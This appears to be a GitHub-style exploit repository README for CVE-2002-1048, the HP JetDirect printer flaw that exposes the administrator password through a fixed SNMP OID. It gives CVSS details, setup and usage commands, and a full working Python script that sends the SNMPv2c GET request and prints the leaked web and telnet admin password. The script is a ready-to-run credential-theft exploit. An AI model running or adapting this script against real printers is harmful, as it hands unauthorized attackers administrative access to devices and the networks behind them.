PRIMARY CATEGORY → EXPLOITS
CVE-2002-1048 💥 → HP JetDirect Printer
Attack Vector 🗡️ → Information Disclosure/Leakage through a SNMP Query
Affected Versions 🚨 → Lower than X.22.09v
Severity 🚩 → e.g. High 7.5/10
Information
Overview
Hewlett Packard (HP) printers store sensitive administrative account information in a variable that is served to any user that makes a certain SNMP request
Description
HP JetDirect-enabled printers are configurable via HTTP and Telnet and accept SNMP requests. These printers store the administrative account password in an SNMP variable that can be read by any remote user that knows the address of the printer and the location of the variable. The location of the variable is unchanging.
CVSS v2.0 Score
TL;DR → (AV:N/AC:L/Au:N/C:P/I:P/A:P)
| CVSS Base Metrics | Values |
|---|---|
| Access Vector (AV) | Network |
| Access Complexity (AC) | Low |
| Authentication (AU) | None |
| Confidentiality (C) | Partial |
| Integrity (I) | Partial |
| Availability (A) | Partial |
Setup
python3 -m venv ./venv
source ./venv/bin/activatepip install -r ./requirements.txtUsage
Help Display
python3 CVE-2002-1048.py --helpScript Execution
python3 CVE-2002-1048.py <HOST> <SNMPV2C_COMMUNITY_STRING>
Zoom In
Code
Exploit
#!/usr/bin/env python3 import argparse import asyncio import sys import time from puresnmp import Client, V2C, PyWrapper from colorama import Fore, Style from pwn import * def banner() -> str: return f"""{Fore.GREEN} ______ ______ ___ ___ ___ ___ ______ ____ ___ / ___/ | / / __/___|_ |/ _ \/ _ \|_ |__< / _ \/ / /( _ ) / /__ | |/ / _//___/ __// // / // / __/___/ / // /_ _/ _ | \___/ |___/___/ /____/\___/\___/____/ /_/\___/ /_/ \___/ {Style.RESET_ALL}""" async def getOID(host: str, comm_string: str, oid: str) -> str: """ This function creates a Client Object related to the SNMP Agent which is wrapped using the PyWrapper class > Note that PyWrapp takes a Class an argument and converts its sync methods to async A GET SNMP Request is then made by calling the get method of the Client Object It returns the value associated with the requested OID """ try: client = PyWrapper(Client(host, V2C(comm_string))) response = await client.get(oid) return response.decode() except Exception as e: raise RuntimeError(Fore.RED + f"Error: {e}" + Style.RESET_ALL) async def main() -> None: oid = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0" print(banner()) parser = argparse.ArgumentParser( description = Fore.MAGENTA + '''This tool queries via SNMPv2c an specific OID value which corresponds to the admin passwd for the web and telnet services''' + Style.RESET_ALL ) parser.add_argument('host', help='SNMP Agent') parser.add_argument('community_string', help='SNMPv2c Community String') opts = parser.parse_args() if len(sys.argv) != 3: parser.print_help() sys.exit(1) print(Fore.CYAN + f"""Target → {Fore.MAGENTA}{opts.host}{Fore.CYAN} Community String → {Fore.MAGENTA}{opts.community_string}{Fore.CYAN} OID → {Fore.MAGENTA}{oid} """ + Style.RESET_ALL ) p = log.progress(Fore.CYAN + "SNMPv2C" + Style.RESET_ALL) p.status( Fore. MAGENTA + f"Requesting the OID to {Fore.YELLOW}{opts.host}{Fore.MAGENTA} using {Fore.YELLOW}{opts.community_string}{Fore.MAGENTA} as Community String... ⌛" + Style.RESET_ALL ) await asyncio.sleep(2) print( "\n", Fore.CYAN + f"{oid}" + Style.RESET_ALL, " = ", Fore.GREEN + await getOID(opts.host, opts.community_string, oid) + Style.RESET_ALL, "\n" ) if __name__ == '__main__': asyncio.run(main())